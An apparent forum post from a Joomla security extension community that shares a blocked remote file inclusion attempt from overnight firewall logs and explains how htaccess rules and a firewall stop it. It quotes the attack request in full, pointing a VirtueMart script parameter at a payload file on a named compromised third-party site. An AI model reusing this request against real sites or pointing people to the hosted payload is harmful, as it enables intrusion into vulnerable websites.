I Was just going through some of our over night logs and though i would share a real life example of a compromised site which was trying to hack one of our sites. Its simply intended to demonstarter (for those who do not know or indeed think it'll happen to them) what happens and the importance of security tools like admin tools.
Ok so im looking through our logs and see the following:
WAF Rules: Remote File Injection attempt in ARGS (AE)"] [data ""] [severity "CRITICAL"] -
GET /com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.xclusivetouch.co.uk/cache/test.txt?? HTTP/1.1
Message: Access denied with code 403 (phase 2)
So in short this poor sod's joomla website (www.xclusivetouch.co.uk) has been hacked and the hacker is trying to hack one of our virtuemart sites using an already hacked site.
This is probably the most common form of attack.
If you look at the hacked site, www.xclusivetouch.co.uk/cache/test.txt you will see its the cache dire which is compromised
If you have any decient desktop av software it will block you from accessing this file. however if you even go www.xclusivetouch.co.uk/cache you can see the entire directory.
This is indeed at crying shame and intended to simple demo as to what goes on out their.
On the compromised site:
- AT htaccess maker whould have blocked all this as it woould not have allowed access to the cache folder nor to the inclusion of the so called test.txt
On Our site:
- The RFI shield in WAF easily pics up and block this attempt. Without AT and standard joomla core, THIS IS ALLOWED TO PASS.
When i see these things i always feel bad for site owners and tend to advise them via a quick email, however their are so many its not funny.
Nico you want to add anything to this?
I though it would be a good idea to demonstarte a real life example to AT members on probably the most common form of attack and how easily it can be prevented.